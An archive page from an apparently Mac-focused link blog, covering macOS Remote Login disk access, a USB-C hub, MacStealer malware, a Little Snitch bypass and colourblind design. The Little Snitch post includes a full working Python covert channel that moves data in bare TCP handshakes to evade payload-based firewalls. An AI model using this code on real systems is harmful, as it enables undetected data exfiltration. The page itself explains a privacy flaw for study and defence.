Archive for April 28, 2023

Friday, April 28, 2023

Allowing a Remote Computer to Access Your Mac


Turn on Remote Login to access your Mac from another computer using SSH (Secure Shell Protocol) or SFTP (SSH File Transfer Protocol).

This had been working for me for a long time, but at some point something happened to my TCC database and then rsync started failing:

rsync: opendir "/Users/mjt/Documents/C-Command/." failed: Operation not permitted (1)
rsync: failed to set times on "/Users/mjt/Documents/Code/Git": Operation not permitted (1)

This looked like a Full Disk Access problem, but the old solution of adding sshd and rsync to System Settings ‣ Privacy & Security ‣ Full Disk Access didn’t help.

The trick is that there’s now a separate Allow full disk access for remote users setting, but it’s under General ‣ Sharing instead of Privacy & Security ‣ Full Disk Access. And it’s now only visible if you click the little i button next to Remote Login. With this selected, you don’t need to give sshd Full Disk Access.

There is no corresponding setting in the i next to File Sharing, so perhaps you still have to give smbd Full Disk Access manually.
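
The rsync errors above are a useful fingerprint: TCC denials come back as EPERM ("Operation not permitted", errno 1), whereas an ordinary Unix permissions problem would be EACCES ("Permission denied", errno 13). Here is an added example, not from the post, that parses the two rsync lines quoted above and probes a remote Mac over ssh by listing the folders macOS gates behind TCC. The host alias and the list of protected folders are my assumptions; the ssh probe only runs against a real host, the parser runs offline.

```python
"""Classify rsync/ls errors from a Remote Login session as TCC denials or
ordinary permission problems (added example, not from the original post)."""
import re
import subprocess

# The two rsync lines quoted in the post, reused here as sample input.
RSYNC_LOG_FROM_POST = (
    'rsync: opendir "/Users/mjt/Documents/C-Command/." failed: Operation not permitted (1)\n'
    'rsync: failed to set times on "/Users/mjt/Documents/Code/Git": Operation not permitted (1)\n'
)

# rsync reports: the operation, the quoted path, strerror text and errno in parentheses.
_RSYNC_ERR = re.compile(
    r'^rsync: (?P<op>.*?) "(?P<path>[^"]+)"(?: failed)?: (?P<msg>.+) \((?P<errno>\d+)\)$')

# Folders macOS protects with TCC on top of POSIX permissions (assumed list).
PROTECTED = ("~/Desktop", "~/Documents", "~/Downloads", "~/Library/Mail", "~/Library/Safari")


def classify_errno(errno):
    """EPERM (1) is what TCC returns; EACCES (13) is a plain Unix permission denial."""
    return {1: "tcc-denied", 13: "posix-denied", 2: "missing"}.get(errno, "other")


def parse_rsync_errors(log):
    """Return [(operation, path, classification)] for every rsync error line in `log`."""
    found = []
    for line in log.splitlines():
        m = _RSYNC_ERR.match(line.strip())
        if m:
            found.append((m.group("op"), m.group("path"),
                          classify_errno(int(m.group("errno")))))
    return found


def classify_ls(stderr):
    """Classify the stderr of `ls <folder>` run in a remote login shell."""
    if not stderr.strip():
        return "readable"
    if "Operation not permitted" in stderr:
        return "tcc-denied"
    if "Permission denied" in stderr:
        return "posix-denied"
    if "No such file" in stderr:
        return "missing"
    return "other"


def probe_remote(host, folders=PROTECTED):
    """ssh to `host` (a hypothetical alias) and try to list each TCC-protected folder.
    A column of 'tcc-denied' means 'Allow full disk access for remote users' is off
    for the account you logged in as; 'posix-denied' points at ordinary permissions."""
    report = {}
    for folder in folders:
        proc = subprocess.run(["ssh", host, f"ls {folder} >/dev/null"],
                              capture_output=True, text=True)
        report[folder] = classify_ls(proc.stderr)
    return report


if __name__ == "__main__":
    for op, path, verdict in parse_rsync_errors(RSYNC_LOG_FROM_POST):
        print(f"{verdict:12} {op}: {path}")
```

If every protected folder comes back "tcc-denied" after you have already granted sshd Full Disk Access, that is the symptom described above, and the fix is the Remote Login toggle under General ‣ Sharing rather than anything in Privacy & Security.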


Belkin Connect USB-C Hub

Juli Clover:

Popular Apple accessory maker Belkin recently introduced the Connect 4-Port USB-C Hub, which is the company’s first U.S. product made from post-consumer recycled plastics (PCR).


Made to be compact, the hub includes four USB-C 3.2 Gen 2 ports, and it supports pass-through charging of up to 100W.


Belkin says that its new USB-C hub is the only hub on the market able to deliver a maximum of 10Gb/s, which is 2x faster than other available hubs.

This seems like a pretty good deal at $44.99, but if you use one port for PD it really only gives you an additional two USB-C ports. We’re now about eight years into this transition, and there still seems to be no way to attach a large number of USB-C devices without using adapters.

My peripherals still use a mix of ports. Hotels and other public charging places use mostly USB-A. These days I’m carrying cables and adapters for USB-A, USB-C, Micro-USB, Lightning, MagSafe, and Apple Watch. Some devices need multiple cables, because sometimes I want to charge them from my MacBook Pro (USB-C only) but other times from USB-A.


Update (2023-05-01): This is not the first such hub, as I mentioned the Sitecom CN-386 three years ago. However, the reviews for that one weren’t great; I have more faith in this one given Belkin’s reputation. Marco Arment says that perhaps the lack of USB-C hubs with lots of ports is due to the inability to support so many full-speed connections. If so, I would certainly welcome hubs with a mix of fast and slow ports, as were common with earlier versions of USB. That complexity would be a small price to pay to get more ports—and not need to use adapters or daisy-chain hubs.

MacStealer Malware

Jovi Umawing (Hacker News, MacRumors):

Users are manipulated to download and execute this file onto their systems. Once achieved, a bogus password prompts users in an attempt to steal their real password. MacStealer then saves the password in the affected system’s temporary folder (TMP).

The malware then proceeds to collect and save the following also within the TMP folder:

  • Account passwords, browser cookies, and stored credit card details in Firefox, Chrome, and Brave
  • Cryptocurrency wallets (Binance, Coinomi, Exodus, Keplr Wallet, Martian Wallet, MetaMask, Phantom, Tron, Trust Wallet)
  • Keychain database in its encoded (base64) form
  • Keychain password in text format


MacStealer being an unsigned DMG file is also a barrier for anyone, especially beginners, attempting to run the program on a modern mac, said Malwarebytes’ Reed. “Its attempt at phishing for login passwords is not very convincing and would probably only fool a novice user. But such a user is exactly the type who would have trouble opening it.”

I wonder whether this last point means to say that the app is unsigned or unnotarized. An unsigned disk image is not more difficult to open. It just means that the app will run under translocation, which doesn’t seem like it would provide any protection in this case.

I’m surprised we haven’t heard about more malware like this.
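
Since the unsigned/unnotarized distinction matters for what Gatekeeper will actually do, here is an added example (mine, not from Malwarebytes or the MacStealer analysis) that classifies an app from spctl's own assessment output and spots App Translocation from the running binary's path. The "source=" strings are assumed from what spctl prints on recent macOS, and the sample outputs are constructed, not captured from real apps.

```python
"""Tell an unsigned app from a signed-but-unnotarized one using Gatekeeper's
assessment tool (added example, not from the original post)."""
import re
import subprocess

# spctl names the rule that accepted or rejected the bundle on a "source=" line.
# The values below are assumed from recent macOS; anything unrecognised is "other".
_SOURCE = re.compile(r"^source=(?P<source>.+)$", re.MULTILINE)
_VERDICT = re.compile(r": (?P<verdict>accepted|rejected)\b")

# Constructed sample outputs in the shape spctl prints (assumed, not real captures).
SAMPLE_NOTARIZED = ("Good.app: accepted\nsource=Notarized Developer ID\n"
                    "origin=Developer ID Application: Example Corp (TEAMID0000)\n")
SAMPLE_UNNOTARIZED = ("Meh.app: rejected\nsource=Unnotarized Developer ID\n"
                      "origin=Developer ID Application: Example Corp (TEAMID0000)\n")
SAMPLE_UNSIGNED = "Bad.app: rejected\nsource=no usable signature\n"


def assess(app_path):
    """Run Gatekeeper's execute-policy assessment and return its combined text output."""
    proc = subprocess.run(["spctl", "--assess", "--type", "execute", "-vv", app_path],
                          capture_output=True, text=True)
    return proc.stdout + proc.stderr


def classify(assessment):
    """Map spctl output to one of: notarized, signed-unnotarized, unsigned, other."""
    verdict = _VERDICT.search(assessment)
    source = _SOURCE.search(assessment)
    src = source.group("source").strip() if source else ""
    if verdict and verdict.group("verdict") == "accepted" and src.startswith("Notarized"):
        return "notarized"
    if src.startswith("Unnotarized"):
        return "signed-unnotarized"
    if src == "no usable signature":
        return "unsigned"
    return "other"


def is_translocated(executable_path):
    """True when the binary runs from the read-only App Translocation mount macOS
    creates for quarantined apps launched from an unapproved location."""
    return "/AppTranslocation/" in executable_path


if __name__ == "__main__":
    import sys
    for app in sys.argv[1:]:
        print(app, classify(assess(app)))
```

An unsigned bundle lands in the "unsigned" bucket and Gatekeeper refuses to open it by default; a signed but unnotarized one is "signed-unnotarized" and is also refused on current macOS, but for a different reason that is worth reporting accurately.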


Bypassing Little Snitch With Empty TCP Packets

Jeff Johnson:

When you look at the implementation of Little Snitch, the interpretation of the word “data” becomes crucial. Technically, unless you allow the connection, Little Snitch does indeed prevent HTTP data from getting sent. Nonetheless, Little Snitch does not prevent TCP (Transmission Control Protocol) data from getting sent. This TCP data includes your IP address, which can often be used to personally identify you. The server knows that you, i.e., your IP address, tried to connect to the server, even when Little Snitch “denies” the connection.


Objective Development told me that Little Snitch uses deep packet inspection to try to get a name for the connection.


An HTTP connection over TCP has to initiate a 3-step “handshake” before any actual data—such as HTTP headers—can be sent over the connection. Every TCP packet, including any packet involved in the handshake, contains the IP addresses of the sender and the receiver.

Ryan Gerstenkorn:

If you set up a TCP connection and close it before sending any data, an alert will not be triggered by Little Snitch.


This behavior is enough to enable two-way communications between a server and a client running behind Little Snitch without being detected by using the destination port to encode data.


To demonstrate exfiltrating data we will be encoding it across eight ports where each port maps to a bit in memory. All bits default to zero, when a connection is established to port X, the associated bit X is set to one. Once we have made all the connections needed, and the bits are set correctly in memory, we can then send a connection to a ninth port, indicating to the server that the current cycle is complete. The current byte is read, flushed to stdout, and the server state is then reset.
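
Jeff's point (the server learns your address from the handshake alone) and Ryan's (the destination port can carry data) are the same observation from two sides, so here is one added example, written by me rather than taken from either post, that puts them together on loopback: a server listening on eight "bit" ports plus one terminator port, and a client that completes a handshake to the ports of each set bit and closes without ever sending application data. The port numbers are whatever the OS hands out, and the short settle delay between bytes is an assumption of this demo, not part of Ryan's design. Run it on a Mac behind a payload-only filter and the server still decodes the message and logs every peer address.

```python
"""Port-encoded covert channel built only from TCP handshakes (added example,
not from Jeff Johnson's or Ryan Gerstenkorn's posts)."""
import selectors
import socket
import threading
import time

HOST = "127.0.0.1"
BITS = 8  # ports[0..7] carry one bit each; ports[8] terminates the current byte


def touch(host, port):
    """Complete the three-way handshake, then close: zero bytes of payload ever sent."""
    with socket.create_connection((host, port), timeout=5):
        pass


class PortChannelServer:
    """Listens on BITS + 1 ports and rebuilds bytes from connection attempts alone."""

    def __init__(self, host=HOST):
        self.sel = selectors.DefaultSelector()
        self.ports = []
        self.current = 0             # bits of the byte being assembled
        self.received = bytearray()  # decoded bytes
        self.peers = []              # (ip, port) of every attempt: the address leak
        self.payload_bytes = 0       # stays 0: nothing is carried in-band
        self._stop = threading.Event()
        for idx in range(BITS + 1):
            ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            ls.bind((host, 0))       # port 0: let the OS pick a free port
            ls.listen(16)
            ls.setblocking(False)
            self.ports.append(ls.getsockname()[1])
            self.sel.register(ls, selectors.EVENT_READ, data=idx)
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()

    def stop(self):
        self._stop.set()
        self._thread.join()
        for key in list(self.sel.get_map().values()):
            self.sel.unregister(key.fileobj)
            key.fileobj.close()
        self.sel.close()

    def _serve(self):
        while not self._stop.is_set():
            events = self.sel.select(timeout=0.05)
            # Bit ports first, terminator last: a byte's bit handshakes all complete
            # before the client can even start the terminator handshake.
            for key, _ in sorted(events, key=lambda ev: ev[0].data):
                try:
                    conn, peer = key.fileobj.accept()
                except BlockingIOError:
                    continue
                self.peers.append(peer)
                conn.setblocking(False)
                try:
                    self.payload_bytes += len(conn.recv(64))
                except OSError:
                    pass                 # nothing sent, and nothing ever will be
                conn.close()
                if key.data < BITS:
                    self.current |= 1 << key.data
                else:
                    self.received.append(self.current)
                    self.current = 0


def send_covert(ports, payload, host=HOST, settle=0.2):
    """Encode each byte as connections to the ports of its set bits, then the terminator."""
    for byte in payload:
        for bit in range(BITS):
            if byte >> bit & 1:
                touch(host, ports[bit])
        touch(host, ports[BITS])
        time.sleep(settle)  # let the decoder drain this byte before the next one starts


def run_demo(message=b"Hi!"):
    """Returns (decoded bytes, connection attempts seen, in-band payload bytes)."""
    server = PortChannelServer()
    server.start()
    try:
        send_covert(server.ports, message)
        time.sleep(0.2)
    finally:
        server.stop()
    return bytes(server.received), len(server.peers), server.payload_bytes


if __name__ == "__main__":
    decoded, attempts, in_band = run_demo()
    print(f"decoded={decoded!r} attempts={attempts} in_band_bytes={in_band}")
```

The server never reads a single application byte, yet it ends up with the message and a peer list containing the client's address once per set bit and once per byte. A filter that only acts on payload has nothing to act on here; the thing that would have to be blocked is the SYN itself.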

Jeff Johnson:

The addendum of the blog post notes that I had briefly tested LuLu and saw some of the same behavior. After I published my blog post, I sent a link to Patrick Wardle, the developer of LuLu, who has been very responsive and helpful. Moreover, LuLu is open source, so I was able to examine how it works exactly. On further testing with LuLu, I came to believe that there’s actually a bug in the macOS network filter extension implementation. I’ve now filed FB12088655 with Apple: Privacy: Network filter extension TCP connection and IP address leak.

Update (2023-06-09): Christian Bender:

Since we are no longer allowed to ship a kernel extension, we are required to code against this new programming interface. So the question transforms into: “Why does the Network Extension framework allow these data packets?”


The clever move is to run two tasks in parallel: While the three-way handshake is in progress, Apple simultaneously asks all Network Extensions whether to allow or deny the connection. The Network Extensions have at least 20 milliseconds to respond without degrading performance. That is just enough to run complex filters and send responses back to the kernel. The downside is, of course, that the server receives the SYN packet. If it turns out that the packet should be denied, a RST (Reset) packet is sent instead of the SYN/ACK to abort the connection.


We tried to report a successful connect to the app, although the handshake packets were held back. This resulted in an inconsistency in the TCP/IP implementation of the kernel and triggered either a kernel panic or various other errors. […] We therefore assume that it’s hard, even for Apple, to inspect the first data packet without allowing at least the initial handshake.


Considering the different types of attackers, it is unlikely that exploiting the TCP SYN packet will be widely used for large-scale attacks targeting multiple computers. […] However, this method could be of interest to user tracking and analytics, allowing them to gather rough information about installations and some aspects of user behavior. […] It would be naive to think that Little Snitch alone can protect you from [targeted attacks].

Update (2023-06-13): Jeff Johnson (Mastodon):

I’m not persuaded that performance over privacy is a good tradeoff for network extension users. And we don’t even get the choice. Apple is imposing its decision on everyone, with no options. And speaking of performance, do you know what else can degrade it? iCloud Private Relay! […] Additional latency may be the price of protecting your privacy, and that’s a price I’m willing to pay.


Safari is never waiting on the content blocking extension to provide a verdict on individual URL loads.

It seems to me that Apple could do network content filter extensions the same way. Why couldn’t Little Snitch provide its rules to the kernel in advance and let the kernel itself do all of the filtering, without having to switch contexts?


One of the questions I raised in my blog posts was not answered by Objective Development: why does Little Snitch leak your IP address on every TCP connection attempt, when LuLu and my own sample network filter extension do not?

Designing for Colorblindness

Andy Baio:

For some people, colorblindness is a serious liability that closes doors on career dreams. It’s hard to become a pilot, train conductor, or pathologist if you can’t differentiate colors in critical instruments, signals, or tissue samples. For others, it seriously impacts their day-to-day ability to do their jobs, like surveyors spotting flags, doctors looking at skin conditions, or electricians looking for colored wires.

But for me, it’s just a lifelong series of unnecessarily confusing interactions, demonstrating that the world wasn’t designed for people like me.

Jason Snell:

Basically, Tot’s launch screen was utterly baffling to me because I’m (mildly) colorblind and it was asking me to do things based on whether a tiny ring was green or red. I couldn’t see it.

Craig Hockenberry:

The initial releases of Tot didn’t have great accessibility. We knew it needed improving, but experience has shown us the folks who need these features have great ideas and happily share their opinions.


Luckily we have a tool that let me approximate what Jason was seeing. xScope’s vision defect simulator confirmed that Tot’s colored circles had serious issues.